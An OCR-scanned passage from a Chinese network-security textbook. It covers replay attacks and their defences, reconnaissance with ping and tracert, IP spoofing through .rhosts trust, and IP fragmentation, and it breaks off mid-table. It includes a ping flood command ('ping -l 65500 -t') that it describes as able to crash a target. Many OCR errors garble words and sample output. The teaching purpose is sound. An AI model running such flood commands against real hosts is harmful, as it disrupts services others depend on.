为 通过 TCP/IP 网 络 通信 提供 了 通用 的 加 密 方法 。SSH 和 F-SSH 都 有 商业 或 自由 软件 
版 本 。 

除了 加 密 , 还 可 以 使 用 安全 拓扑 结构 来 防止 网 络 监 听 。 什 么 样 的 拓扑 结构 才 是 安全 的 
呢 ? 在 设计 网 络 拓扑 时 ,一般 应 遵循 下 列 规则 : 一 个 网 络 必须 有 足够 的 理由 才能 相信 和 另 一 
网 络 。 网 络 的 设计 应 该 考虑 数据 之 间 的 信任 关系 ,而 不 是 硬件 需要 。 

这 个 规则 意味 着 : 

。 每 个 网 段 仅 由 能 互相 信任 的 计算 机 组 成 ,通常 它们 在 同一 个 房间 或 办 公 室 内 。 

。 所 有 问题 都 归结 到 信任 上 。 计 算 机 为 了 和 其 他 计算 机 进行 通信 ,就 必须 信任 那 台 计 

算 机 ,网 络 管理 员 必 须 使 计算 机 之 间 的 信任 关系 很 小 ,从 而 减少 被 监听 的 风险 。 
。 如 果 某 局 域 网 要 和 Internet 相连 , 仅 有 防火 墙 是 不 够 的 ,因为 人 侵 黑客 已 经 能 从 防 
火 墙 后 面 扫描 ,并 探测 正在 运行 的 服务 。 

对 于 最 后 一 条 ,需要 考虑 到 一 旦 黑客 进入 系统 ,他 能 得 到 些 什 么 。 必 须 考虑 一 条 这 样 的 
路 径 , 即 信任 关系 有 多 长 。 例 如 ,假设 Web 服务 器 对 某 一 计算 机 A 是 信任 的 ,那么 A 信任 
的 其 他 计算 机 有 和 多少 呢 ? 又 有 多 少 计算 机 是 受 这 些 计算 机 信任 的 ? 必须 确定 最 小 信任 关系 
的 那 台 计算 机 。 在 信任 关系 中 ,这 台 计 算 机 之 前 的 任何 一 台 计 算 机 都 可 能 对 你 的 计算 机 进 
行 攻击 并 成 功 。 必 须 保证 一 旦 存在 网 络 监听 程序 , 它 也 只 在 最 小 范围 内 有 效 。 


2.2.4 重 放 攻击 





2.2.4.1 重 放 攻 击 的 原理 

在 网 络 监听 的 基础 上 ,就 可 以 展开 多 种 攻击 了 ,其 中 一 种 就 是 重 放 攻 击 。 

重 放 攻 击 (replay attack) 又 称 重播 攻击 、 回 放 攻 击 或 新 鲜 性 攻击 (freshness attack) 等 ， 
是 指 攻 击 者 向 目标 主机 (A) 发 送 一 个 或 多 个 A 已 接收 过 的 包 ( 特 别 是 在 认证 的 过 程 中 ,用 于 
认证 用 户 身份 所 接收 的 包 , 这 个 包 往往 是 其 他 主机 所 发 出 的 合法 认证 包 )。 重 放 攻 击 会 不 断 
恶意 或 欺诈 性 地 重复 发 起 一 个 有 效 的 数据 传输 来 达到 欺骗 系统 的 目的 ,主要 用 于 身份 认证 
过 程 ,破坏 认证 的 安全 性 。 

重 放 攻 击 一 般 由 发 起 者 首先 利用 网 络 监听 或 者 其 他 方式 拦截 、 盗 取 并 记录 合法 用 户 的 
数据 包 ( 例 如 认证 凭据, 一般 是 cookies 或 者 一 些 认证 会 话 ) ,进行 一 定 的 处 理 后 ,重复 发 送 
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该 数据 包 到 目标 主机 (如 认证 服务 器 )。 

从 这 个 解释 上 理解 ,对 数据 包 的 加 密 可 以 有 效 地 防止 明文 数据 被 监听 ,但 是 防止 不 了 重 
放 攻 击 。 重 放 攻 击 在 任何 网 络 通信 过 程 中 都 可 有 能 发 生 , 是 计算 机 网 络 世 界 黑客 常用 的 攻 
击 方式 之 一 。 

举 个 例子 , 重 放 攻击 非常 类 似 于 “阿里 巴巴 和 四 十 大 盗 ”的 故事 ,其 中 正常 的 用 户 是 四 十 
大 资 ,攻击 者 是 阿里 巴巴 ,而 系统 则 是 藏 着 宝物 的 宝库 。 当 四 十 大 次 准备 把 抢 来 的 珠宝 放 进 
他 们 的 宝库 里 时 ,系统 (宝库 ) 要 求 他 们 认证 ,四 十 大 资 喊 道 : “芝麻 开门 ”, 此 时 认证 通过 ,大 
咨 可 以 进入 宝库 。 而 阿里 巴巴 听 到 了 这 个 口令 ,相当 于 黑客 截获 用 户 的 登录 过 程 ,等 四 十 大 
咨 走 远 后 ,阿里 巴巴 来 到 石门 前 也 大 喊 “芝麻 开门 ”进行 了 重 放 攻 击 ) ,石门 打开 了 ,阿里 巴 
巴 成 功 地 和 人 侵 了 系统 ,把 宝物 都 搬 回 家 了 。 

2.2.4.2 重 放 攻 击 的 防范 

防范 重 放 攻 击 通常 采用 以 下 3 种 方法 。 

1. 挑战 -应 答 机 制 

为 了 抵御 重 放 攻击 ,现在 的 服务 协议 (如 身份 认证 过 程 ) 可 以 采用 “挑战 -应 答 ” 
(challenge/response) 方 式 。 过 程 如 下 : 

(1) 客户 端 向 系统 申请 登录 。 

(2) 系统 发 送 挑战 值 给 客户 端 。 

(3) 客户 端 计算 相应 的 应 答 值 (可 以 用 MD5 算法 等 计算 应 答 值 ) 。 

(4) 客户 端 发 送 应 答 值 给 系统 。 

(5) 系统 通过 同样 的 算法 判断 应 答 值 是 否 正确 。 

(6) 如 果 正 确 则 通过 认证 ,允许 用 户 继续 后 面 的 操作 ,认证 结束 ; 如 果 不 正确 则 断 开 连 
接 , 结 束 。 

这 里 要 注意 的 是 ,挑战 值 变化 量 必须 要 很 大 ,一 般 为 随机 数 , 若 挑战 值 变化 量 不 大 ,攻击 
者 只 需 截 获 足 够 的 挑战 -应 答 关 系 , 就 可 以 进行 重 放 攻 击 了 。 

以 “阿里 巴巴 和 四 十 大 次 "的 故事 为 例 , 如 果 宝 库 临时 给 阿里 巴巴 一 个 短语 (如 “芝麻 开 
门 n”, 其 中 是 一 个 随机 数字 ,意味 着 阿里 巴巴 的 n 和 四 十 大 盗 的 n 不 一 样 ), 要 求 阿里 巴 
巴 通过 一 个 给 定 的 算法 进行 特殊 处 理 , 而 阿里 巴巴 不 知道 这 个 算法 ,无 法 给 出 一 个 合适 的 应 
答 值 给 宝库 ,宝库 不 能 开门 。 

2. 时 间 戳 

时 间 截 (又 称 为 时 截 ) 是 一 个 代表 当前 时 刻 的 数值 。 

基于 时 间 截 的 防范 方法 的 原理 基于 这 样 一 个 事实 , 重 放 攻 击 的 时 间 蕉 将 相对 远离 当前 
时 刻 , 即 不 是 最 新 的 时 间 。 该 方法 对 于 通信 双方 有 着 较为 严 苛 的 要 求 , 即 要 求 通信 各 方 的 计 
算 机 时 钟 保持 时 间 上 的 同步 。 

基于 时 间 截 防范 方法 的 基本 思想 是 : 当主 机 A 接收 到 一 个 报 文 时 , 当 且 仅 当 该 报 文 包 
含 了 一 个 时 间 戳 , 且 该 时 间 截 对 于 A 而 言 是 足够 接近 当前 时 刻 的 ,A 才 认 为 该 报 文 是 合 
法 的 。 

以 * 阿 里 巴巴 和 四 十 大 次 ”的 故事 为 例 . 如 果 宝 库 要 求 敲 门 者 给 出 的 暗号 是 “芝麻 开门 十 
当前 时 间 ”, 四 十 大 次 的 时 间 与 宝库 的 时 间 基 本 相同 ,四 十 大 盗 可 以 给 出 合适 的 暗号 ,而 阿里 
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巴巴 与 宝库 的 时 间 很 难保 持 大 致 相同 , 则 无 法 给 出 一 个 合适 的 暗号 给 宝库 ,宝库 不 能 开门 。 

具体 的 处 理 方式 是 ,双方 设置 大 小 适当 的 时 间 窗 (间隔 ) ,该 时 间 窗 越 大 越 能 包容 网 络 传 
输 延 时 ( 即 延 迟 大 的 报 文 也 被 认为 是 合法 的 ,这 对 于 网 络 条 件 不 够 良好 的 情况 来 说 较为 重 
要 ), 越 小 越 能 防范 重 放 攻击 。 

3. 序号 

通信 双方 通过 在 报 文中 添加 双方 都 认可 的 序列 号 来 判断 报 文 的 新 鲜 性 ,进而 判断 是 否 
合法 。 这 要 求 通信 双方 必须 事先 协商 一 个 初始 序列 号 (ISN) ,并 协商 递增 方法 。 这 个 初始 
序列 号 应 该 尽量 避免 具有 一 定 的 规律 性 。 

仍然 以 “阿里 巴巴 和 四 十 大 盗 ”的 故事 为 例 ,如 果 四 十 大 资 给 出 的 暗号 里 面 添 加 了 一 个 
数字 ,而 这 个 数字 只 能 使 用 一 次 ,下 次 使 用 时 必须 按照 某 种 规律 进行 递增 ,虽然 阿里 巴巴 喊 
出 了 与 大 盗 一 样 的 暗号 ,宝库 也 不 会 开门 。 即 便 阿 里 巴巴 猜 出 了 规律 ,也 必须 在 大 咨 下 一 次 
到 来 之 前 进行 印 门 ,否则 序号 又 要 重新 计算 了 。 当 然 , 如 果 阿 里 巴巴 猜 出 了 规律 ,并 在 大 次 
下 一 次 到 来 之 前 进入 了 宝库 , 则 大 盗 就 无 法 进入 宝库 了 。 


2.3 网 络 层 攻击 技术 


Internet 的 网 络 层 协议 IP 以 * 尽 力 传输 ”作为 在 网 络 间 转 发 数据 分 组 的 目标 ,因此 IP 
协议 只 提供 了 简单 的 认证 一 一 基于 IP 地 址 的 认证 ,并 且 没 有 对 数据 进行 任何 加 密 , 直接 采 
用 明文 传输 。 因 此 ,有 很 多 手段 可 以 针对 Internet 网 络 层 的 弱点 进行 攻击 ,包括 被 动 的 扫描 
和 各 种 类 型 的 主动 攻击 ,如 IP 地 址 欺骗 、 碎 片 攻击 ICMP 攻击 .路 由 欺骗 .ARP 欺骗 等 。 


2.3.1 网 络 层 扫描 


扫描 是 一 种 典型 的 被 动 攻击 方法 ,主要 用 于 获得 目标 主机 的 各 种 信息 。 因 为 攻击 者 所 
运用 的 各 种 工具 ,软件 都 是 基于 现 有 计算 机 网 络 中 存在 的 各 种 漏洞 ,所 以 他 首先 要 了 解 自 己 
的 目标 有 哪些 可 用 的 漏洞 。 

扫描 的 方法 很 多 ,可 以 手工 进行 ,也 可 以 用 扫描 器 软件 进行 。 扫 描 可 以 获得 网 络 层 的 信 
息 ,也 可 以 获得 传输 层 有 关 的 端口 信息 。 

本 节 主 要 介绍 几 个 常用 的 网 络 相关 命令 ,这 些 命令 可 以 告诉 攻击 者 有 关 目 标 主机 、 目 标 
网 络 的 情况 。 端 口 扫描 将 在 2. 4. 1 节 中 介绍 。 

2.3.1.1 ping 

ping 是 一 个 很 常用 并 且 * 历 史 悠久 ?的 网 络 测试 工具 , 它 可 以 检测 网 络 目标 主机 存在 与 
和 否 以 及 网 络 是 否 正常 (能 否 通达 )。ping 的 原理 是 : 向 目标 主机 传送 小 数据 包 , 目 标 主 机 接 
收 并 将 该 包 反 送 回来 ,如 果 返 回 的 数据 包 和 发 送 的 数据 包 一 致 , 那 就 是 说 ping 命令 成 功 了 。 

通过 对 返回 的 数据 进行 分 析 , 就 能 判断 计算 机 是 否 开 着 ,或 者 这 个 数据 包 从 发 送 到 返回 
需要 多 少时 间 。 根 据 响应 时 间 和 数据 丢失 率 ,判断 与 对 方 的 连接 成 功 与 否 ,连接 效果 、 速 度 
如 何 。 用 户 可 以 使 用 ping 命令 测试 与 目标 主机 的 连接 质量 ,或 者 测试 用 户 的 机 器 能 否 连接 
到 某 个 网 站 。 
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可 以 说 ,ping 是 一 种 常用 的 基本 的 扫描 命令 ,常常 用 来 扫描 目标 主机 是 否 还 活着 
(alive)。 但 是 ,需要 指出 的 是 ,如 果 目 标 主机 不 允许 请 求 方 对 自己 进行 ping 操作 , 则 此 时 请 
求 方 也 是 无 法 获得 正确 应 答 的 。 例 如 : 


ping -a 172.20.1.10 
结果 如 下 : 


Pinging MISSERVER [172.20.1.10] with 32 bytes of data: 
Reply from 172.20.1.10: bytes= 32 time< 10ms TIL= 128 
Reply from 172.20.1.10: bytes= 32 time< 10ms TIL= 128 
Reply from 172.20.1.10: bytes =32 time< 10ms TIL= 128 
Reply from 172.20.1.10: bytes = 32 time< 10ms TIL= 128 


Ping statistics for 172.20.1.10: 

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli — seconds: 
Minimum = Oms, Maximum = Oms, Average = Oms 


从 上 面 的 结果 就 可 以 知道 IP 为 172. 20. 1. 10 的 计算 机 NetBios 名 为 MISSERVER。 

默认 情况 下 ,ping 只 发 送 4 个 数据 包 , 如 果 用 户 需要 自己 定义 发 送 数 据 包 的 个 数 , 以 衡 
量 网 络 速度 ,可 以 用 -n 选项 。 例如, 用户 想 测试 发 送 20 个 数据 包 的 返回 的 平均 时 间 、 最 快 
时 间 和 最 慢 时 间 , 可 以 输入 下 面 的 命令 : 


C:\>ping -n20 263.net 
结果 如 下 : 


Pinging 263. net [202.96.44.48] with 32 bytes of data: 
Reply from 202.96.44.48: bytes = 32 time = 50ms TIL = 242 
Reply from 202.96.44.48: bytes = 32 time = 40ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 40ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 20ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 50ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TIL = 242 
Reply from 202.96.44.48: bytes = 32 time = 20ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 30ms TIL = 242 
Reply from 202.96.44.48: bytes = 32 time = 70ms TIL = 242 
Reply from 202.96.44.48: bytes = 32 time = 40ms TTL = 242 
Reply from 202.96.44.48: bytes = 32 time = 70ms TTL = 242 
Request timed out. 

Reply from 202.96.44.48: bytes = 32 time = 40ms TIL = 242 
Reply from 202.96.44.48: bytes = 32 time = 20ms TIL = 242 
Reply from 202.96.44.48: bytes = 32 time = 40ms TIL = 242 











Ping statistics for 202.96.44.48: 
Packets: Sent = 20, Received = 19, Lost = 1 (5% loss), 
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Approximate round trip times in milli— seconds: 

Minimum = 20ms，Maximum = 70ms，Rverage = 35ms 

根据 以 上 输出 内 容 可 知 , 在 发 给 263. net 的 20 个 数据 包 中 ,返回 了 19 个 ,其 中 有 1 个 
由 于 未 知 原因 丢失 ,这 20 个 数据 包 当 中 返回 速度 最 快 为 20ms, 最 慢 为 70ms, 平 均 速度 
为 35ms。 

ping 命令 还 有 很 多 可 选 参数 ,这 些 参数 组 合 起 来 有 时 可 以 实现 攻击 性 的 命令 ,例如 : 


C:\>ping -165500 —t 172.20.1.10 
结果 如 下 : 


Pinging NEWSERVER [172.20.1.10] with 32 bytes of data: 
Reply from 172.20.1.10: bytes = 32 time< 10ms TIL= 128 
Reply from 172.20.1.10: bytes = 32 time< 10ms TIL= 128 
Reply from 172.20.1.10: bytes = 32 time< 10ms TIL= 128 
Reply from 172.20.1.10: bytes =32 time< 10ms TIL= 128 


在 默认 的 情况 下 ,在 Windows 系统 中 ping 发 送 的 数据 包 大 小 为 32B, 用 户 也 可 以 自己 
定义 它 的 大 小 ,但 最 大 只 能 发 送 65 500B。 因 为 Windows 早期 的 系统 (如 Windows 95) 有 一 
个 安全 漏洞 , 即 当 向 对 方 一 次 发 送 的 数据 包 大 于 或 等 于 65 532B 时 ,对 方 就 很 有 可 能 死机 ， 
微软 公司 为 了 解决 这 一 安全 漏洞 ,限制 了 ping 的 数据 包 大 小 。 

虽然 微软 公司 已 经 做 了 此 限制 ,但 几 个 参数 相配 合 后 危害 依然 非常 强大 ,上 面 的 命令 产 
生 的 后 果 就 是 不 停 地 向 172. 20. 1. 10 计算 机 发 送 大 小 为 65 500B 的 数据 包 。 

当然 ,如 果 只 有 一 台 计 算 机 也 许 没有 什么 效果 ,但 是 如 果 有 很 多 计算 机 同时 不 间断 地 发 
送 这 种 数据 包 , 那 么 就 可 以 使 对 方 完 全 瘫痪 ,因为 对 方 的 主机 一 直 忙 于 给 源 主机 回 送 
65 500B 的 数据 包 , 以 至 于 不 能 再 做 其 他 事 ,严重 时 就 会 死机 。 

2.3.1.2 tracert 

tracert 命令 用 来 跟踪 一 个 报 文 从 源 主机 到 目的 主机 所 经 过 的 路 径 , 例 如 : 


C:\WINDOWS > tracert www. sybase. com 
Tracing route to vip101. sybase. com [192.138.151.101] over a maximum of 30 hops: 
1 <1l0ms <10ms <10ms 211.65.103.129 
2 <1l0ms <10ms <10ms 192.168.2.2 
3 <1l0ms <10ms <10ms 210.29.33.1 
4 <1l0nms <10ms <10ms 210.29.32.26 
5 <10ms <10ms <10ms 210.29.32.1 
6 
时 
8 


忆 


<10ms <10ms <10ms 202.112.24.25 
<10 ms 10 ms 20 ms 202.112.53.85 
10 ms 10 ms 20 ms 202.112.46.73 
9 30 ms 40 ms 40 ms 202.112.46.65 
10 40 ms 40 ms 30 ms 202.112.53.5 
11 30 ms 40 ms 30 ms 202.112.1.212 
12 30ms 30 ms 41 ms 202.112.36.193 
13 191ms 190ms 190ms 202.112.61.22 
14 190ms * 190 ms teleglobe.net [64.86.173.33] 
15 200ms 190ms 20l1ms if—-4-0.corel.LosAngeles2.Teleglobe.net [64.86.80.34] 


38 网 络 安全 





16 * 210 ms 200ms p7-2.lsancal - cr10. bbnplanet.net [4.24.118.105] 

17 * 191 ms “ 200 ms p3-0.lsancal— brl.bbnplanet.net [4.24.5.130] 

18 200ms 221ms 190ms p6-0.lsanca2— brl.bbnplanet.net [4.24.5.49] 

19 * 200ms 21llms pl5-0.snjpcal - brl.bbnplanet.net [4.24.5.58] 

20 = 类 210 ms “pl1 - 0. snjpcal - crl.bbnplanet.net [4.24.9.134] 

21 210 ms * 221 ms p5-0-0.oakland- brl.bbnplanet.net [4.0.1.193] 

22 221ms 320ms 330ms f1-0.o0akland— cr2.bbnplanet.net [4.0.16.6] 

23 220ms * 关 hl - 0- 0. sybaseinc. bbnplanet. net [4.0.68.246] 

24 21llms 210ms 220ms surf0160. sybase. com [192.138.149.160] 

25 210ms 210ms 关 vip101. sybase. com [192.138.151.101] 

Trace complete. 

最 左边 的 数字 是 该 路 由 通过 的 主机 的 顺序 。 由 于 每 条 消息 每 次 的 往返 时 间 不 一 样 ， 
tracert 将 显示 往返 时 间 3 次 。“ * ”表示 往返 时 间 太 长 ,tracert 将 这 个 时 间 “ 忘 掉 了 ”。3 次 
时 间 信 息 之 后 ,显示 经 过 的 IP 地 址 ,有 的 是 机 器 名 称 。 

2.3.1.3 其 他 扫描 命令 

除了 ping 和 tracert 命令 ,还 有 一 些 其 他 命令 也 可 以 用 来 了 解 目 标 主机 的 信息 ,如 
UNIX 的 命令 rusers \finger 和 hosts 等 。 

rusers 和 finger 命令 可 以 收集 到 目标 计算 机 上 有 关 用 户 的 消息 。rusers 命令 能 够 显示 
远程 登录 的 用 户 名 、 该 用 户 的 上 次 登录 时 间 、 使 用 的 Shell 类 型 等 。 

finger 命令 能 显示 用 户 的 状态 。 该 命令 建立 在 客户 /服务 器 模型 上 ,用 户 通过 客户 端 软 
件 向 服务 器 请 求 信息 ,服务 器 解释 这 些 信息 ,并 返回 给 用 户 。 在 服务 器 上 一 般 运 行 一 个 精灵 
程序 Fingerd ,根据 服务 器 的 配置 ,能 向 客户 提供 某 些 信 息 , 如 用 户 名 、 登 录 的 主机 、 登 录 
日 期 等 。 

hosts 命令 可 以 收集 到 一 个 域 里 所 有 计算 机 的 重要 信息 ,包括 : 一 个 域 中 名 字 服 务 器 的 
地 址 ,每 台 计 算 机 上 的 用 户 名 ,一 台 服 务 器 上 正在 运行 什么 服务 ,这 个 服务 是 哪个 软件 提供 
的 ,计算 机 上 运行 的 是 什么 操作 系统 等 ,而 且 只 花费 很 少 的 时 间 。 

如 果 入 侵 的 黑客 知道 目标 计算 机 上 运行 的 操作 系统 和 服务 ,就 能 利用 已 经 发 现 的 漏洞 
进行 攻击 。 如 果 目 标 计算 机 的 网 络 管理 员 没 有 对 这 些 漏 洞 及 时 修补 ,黑客 就 能 轻而易举 地 
闻 入 该 系统 ,获得 管理 员 权 限 , 并 留 下 后 门 。 

如 果 入 侵 黑 客 得 到 了 目标 计算 机 上 的 用 户 名 ,能 使 用 口令 破解 软件 ,多 次 试图 登录 目标 
计算 机 (现在 很 多 网 站 要 求 用 户 登录 时 除了 用 户 名 和 密码 ,还 必须 每 次 输入 随机 的 “验证 
码 ”, 就 是 为 了 不 让 口令 破解 软件 直接 暴力 破解 用 户 的 密码 )。 经 过 若干 次 尝试 后 ,就 有 可 能 
进入 目标 计算 机 。 因 此 得 到 了 用 户 名 就 等 于 得 到 了 一 半 的 进入 权限 , 剩 下 的 只 是 使 用 软件 
进行 攻击 而 已 。 

由 于 进行 端口 扫描 之 前 ,入 侵 黑客 首先 得 搞 清楚 该 主机 是 否 已 经 在 运行 ,通常 会 借助 上 
面 介绍 的 这 些 命令 ,所 以 现在 大 多 数 服务 器 上 都 关闭 了 对 这 些 探测 命令 的 响应 ,或 者 限制 了 
这 些 命令 的 使 用 。 可 见 , 网 络 的 防范 措施 往往 是 被 攻击 手段 推动 着 进步 的 。 


2.3.2 IP 欺骗 


IP 欺骗 就 是 攻击 者 假冒 他 人 IP 地 址 发 送 数据 包 。IP 包 一 旦 从 网 络 中 发 送出 去 , 源 IP 
地 址 就 几乎 不 用 , 仅 在 中 间 路 由 器 因 某 种 原因 丢弃 它 或 到 达 目 标 端 后 才 被 使 用 。 
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由 于 IP 协议 不 对 数据 包 中 的 IP 地 址 进行 认证 ,因此 任何 人 不 经 授权 就 可 伪造 IP 包 的 
源 地 址 。IP 欺骗 是 利用 不 同 主机 之 间 的 信任 关系 进行 欺骗 攻击 的 一 种 手段 ,这 种 信任 关系 
以 IP 地 址 验证 为 基础 。 

2.3.2.1 信任 关系 

假如 某 网 站 的 用 户 Jack 在 主机 A 上 有 账号 Jack_office, 在 主机 B 上 有 一 个 账号 Jack_ 
mobile, 那 么 在 主机 A 上 使 用 时 需要 输入 在 A 上 的 账户 /口令 ,在 主机 B 上 使 用 时 必须 输入 
在 B 上 的 账户 /口令 ; 并 且 当 主机 A 和 B 同时 连接 在 网 络 上 的 时 候 ,A 和 B 会 把 Jack_ 
office 和 Jack_mobile 这 两 个 用 户 名 当 作 两 个 互 不 相关 的 用 户 , 这 对 Jack 有 时 会 有 些 不 便 。 
为 了 减少 这 种 不 便 , 可 以 在 主机 A 和 主机 B 中 建立 起 这 两 个 账户 的 相互 信任 关系 。 

如 图 2. 8 所 示 , 在 主机 A、B 上 ,分 别 在 用 户 的 home 目录 中 输入 重 定向 命令 。 至 此 ,用 
户 Jack 就 能 毫 无 阻碍 地 使 用 任何 以 r* 开头 的 远程 调用 命令 ,如 rlogin、rcall、rsh 等 ,而 无 
口令 验证 的 烦恼 。 当 然 , 这 些 信任 关系 是 基于 IP 地 址 的 。 


| 主机 A [0 | 主机 B 
用 户 Jack_office 在 自己 的 home “人 =” 用 户 Jack_mobile 在 自己 的 home 


目录 下 输入 命令 目录 下 输入 命令 














Jack_office#echo "B Jack_mobile " Jack_mobile#echo "A Jack_office " 
>~/.rhosts > ~/.rhosts 
重 定向 命令 重 定向 命令 























图 2.8 用 户 Jack 在 主机 A 和 主机 B 上 的 home 目录 中 输入 重 定向 命令 


rlogin 是 一 个 简单 的 客户 机 /服务 器 程序 。rlogin 允许 用 户 从 一 台 主 机 登录 到 另 一 台 
主机 上 。 如 果 目 标 主 机 信任 它 ,rlogin 将 允许 在 不 应 答 口令 的 情况 下 使 用 目标 主机 上 的 资 
源 。 安 全 验证 完全 是 基于 源 主机 的 IP 地 址 。 因 此 ,用 户 能 利用 rlogin 从 B 远程 登录 到 A 
并 且 主 机 不 会 提示 输入 口令 。 

Internet 的 网 络 层 协议 IP 发 送 数 据 包 并 保证 它 的 完整 性 。 如 果 不 能 收 到 完整 的 IP 数 
据 包 ,IP 会 向 源 地 址 发 送 一 个 ICMP 错误 信息 ,希望 重新 处 理 。 然 而 这 个 ICMP 包 也 可 能 
丢失 。 由 于 IP 是 无 连接 的 ,所 以 不 保持 任何 连接 状态 的 信息 。 每 个 IP 数据 包 被 发 送出 去 
不 关心 前 一 个 和 后 一 个 数据 包 的 情况 。 由 此 看 出 ,用 户 其 实 可 以 对 IP 堆栈 进行 修改 ,在 源 
地 址 和 目的 地 址 中 放 入 任意 满足 要 求 的 IP 地 址 ,也 就 是 说 ,提供 虚假 的 IP 地 址 。 如 果 攻 击 
者 把 发 送 的 IP 包 中 的 源 IP 地 址 改 成 被 信任 的 友好 主机 的 IP 地 址 ,利用 主机 间 脆 弱 的 信任 
关系 ,就 可 以 对 信任 主机 进行 攻击 。 例 如 ,UNIX 中 的 所 有 的 rx 命令 都 采用 信任 主机 方案 ， 
所 以 一 个 攻击 主机 把 自己 的 IP 改 为 被 信任 主机 的 IP 后 ,就 可 以 连接 到 信任 主机 并 能 利用 
rx 命令 开 后 门 达到 攻击 的 目的 。 

2.3.2.2 IP 欺骗 的 原理 


当 用 户 的 主机 A 要 与 主机 B 建立 连接 时 , 它 的 通信 方式 是 先 发 请 求 告诉 主机 B“ 我 要 
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和 你 通信 ”, 当 B 收 到 时 ,就 回复 一 个 确认 请 求 包 (ACK) 给 A 主机 。 如 果 A 是 合法 地 址 ,就 
会 再 回复 一 个 确认 (ACK) 给 B, 然 后 两 台 主 机 就 可 以 建立 一 个 通信 渠道 了 。 

可 是 如 果 攻 击 者 主机 A 发 出 包 的 源 地 址 是 一 个 虚假 的 IP 地 址 ,或 者 可 以 说 是 实际 上 
不 存在 的 一 个 地 址 ,那么 B 发 出 的 ACK 自然 无 法 找到 目标 地 址 , 即 无 法 获得 对 方 回复 的 
ACK。 而 在 默认 超时 的 时 间 范 围 以 内 ,主机 B 的 一 部 分 资源 要 用 于 等 待 这 个 ACK 的 响应 
上 ,假如 短 时 间 内 主机 B 接 到 大 量 来 自 虚假 IP 地 址 的 请 求 包 , 它 就 要 占用 大 量 的 资源 来 处 
理 这 些 错误 的 等 待 。 大 量 发 送 这 类 欺骗 型 的 请 求 ,其 结果 就 是 主机 B 上 的 系统 资源 耗 尽 以 
致 瘫痪 。 例 如 ,在 高 考 成 绩 出 来 之 后 ,可 以 查分 的 网 站 本 身 就 有 很 大 的 访问 量 ,如 果 再 受到 
这 种 攻击 ,就 会 导致 无 法 正常 工作 ,将 影响 很 多 人 的 使 用 。 

正常 通信 情况 与 IP 欺骗 情况 如 图 2. 9 所 示 。 


ce 一 我 要 和 你 通信 


国 


主机 A 





ACK : 知道 了 
(a) 正常 的 通信 请 求 


我 要 和 你 通信 ， 


我 的 IP 地 址 是 196.32.*.* 中 
2 


攻击 者 A 














= 主机 B 
真实 IP 地 址 : 
202.110.*.* ACK : 知道 了 
不 存在 1 | 目的 地 二 
一 一 一 二 196324 昌 


(b) IP 欺 骗 
图 2.9 正常 的 通信 请 求 和 IP 欺骗 


攻击 者 使 用 IP 欺骗 的 目的 有 两 种 : 

。 只 想 隐藏 自身 的 IP 地 址 或 伪造 源 IP 和 目的 IP 相同 的 不 正常 包 ,而 并 不 关心 是 否 
能 收 到 目标 主机 的 应 答 , 这 样 很 容易 实现 ,例如 IP 包 碎 片 攻击 、Land 攻击 等 。 

。 伪装 成 被 目标 主机 信任 的 友好 主机 ,并 且 和 希望 得 到 非 授权 的 服务 ,这 时 攻击 者 还 需 
要 使 用 正确 的 TCP 序列 号 ,将 在 2.4 节 详 细 介绍 。 


2.3.3 碎片 攻击 


在 具体 物理 网 络 中 ,数据 链 路 层 协议 对 于 帧 的 最 大 长 度 都 有 限制 , 即 存在 最 大 传输 单元 
(Maximum Transmission Unit, MTU)。 例 如 ,以 太 网 的 MTU 为 1500B, 令 牌 环 网 
(IEEE 802.5) 的 MTU 为 4464B,FDDI 的 MTU 为 4352B,ATM 的 信 元 为 固定 的 48B, 等 
等 。 根 据 IPv4 协议 ,网 络 层 数据 分 组 的 最 大 长 度 为 65 536B, 因 此 , 当 IP 分 组 的 长 度 超过 将 
要 经 过 的 物理 网 络 的 MTU 时 ,在 这 个 网 络 的 人口 路 由 器 上 ,就 要 对 IP 分 组 分 片 ,使 每 一 片 
(fragment) 的 长 度 都 小 于 或 等 于 MTU。 
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IPv4 的 报 文 首部 有 16b 的 标识 字段 (identification)、13b 的 段 偏 移 量 字 段 (fragment 
offset) 、1B 的 DF 和 1B 的 MF 分 段 标识 位 ,用 于 实现 分 片 操作 。 其 中 ,标识 字段 可 以 唯一 
地 标识 主机 发 送 的 每 一 份 数据 报 ,通常 每 发 送 一 份 它 的 值 就 会 加 1, 这 个 报 文 的 所 有 分 片 都 
含有 同样 的 标识 ,不 论 它 被 分 成 多 少 个 片 ,也 不 论 是 第 几 次 分 片 。 接 收 方 依照 标识 字段 ,可 
以 汇集 一 个 数据 报 的 所 有 分 片 中 有 同样 的 标识 字段 的 分 片 。 偏 移 量 字段 是 指 相对 被 分 片 的 
数据 报 , 当 前 分 片 从 哪里 开始 , 它 的 单位 是 8B。 标 志 位 DF=1 时 ,表示 不 允许 路 由 器 对 该 
数据 报 分 片 ,因为 目的 主机 不 能 重组 这 些 分 片 ; DF 二 0 表示 人 允许 分 段 。 标 志 位 MF 二 0 表示 
这 是 最 后 一 个 分 片 ,MF==1 表示 后 面 还 有 其 他 分 片 。 

例如 ,一 个 数据 报 标识 为 10000 ,分 组 总 长 度 为 4980B, 其 中 报 文 首部 长 度 为 20B, 数 据 
部 分 长 度 为 4960B, 使 用 互联 网 中 某 局 域 网 进行 传送 ,该 局 域 网 允许 分 片 且 MTU 为 
1420B, 那 么 这 个 数据 报 在 进入 这 个 局 域 网 后 会 被 分 成 4 片 ( 数 据 部 分 4960B, 分 成 4 片 ,前 
3 片 的 长 度 为 1400B, 第 4 片 长 度 为 760B。 每 片 传输 时 再 加 上 20B 的 首部 ,形成 一 个 完整 的 
分 组 传递 出 去 ) ,各 个 分 片 的 数据 报 首部 相应 字段 如 表 2. 1 所 示 。 


表 2.1 了 数据 报 的 分 片 





分 片 标识 总 长 度 /B ”数据 长 度 /B 段 偏 移 DF 标志 MF 标志 
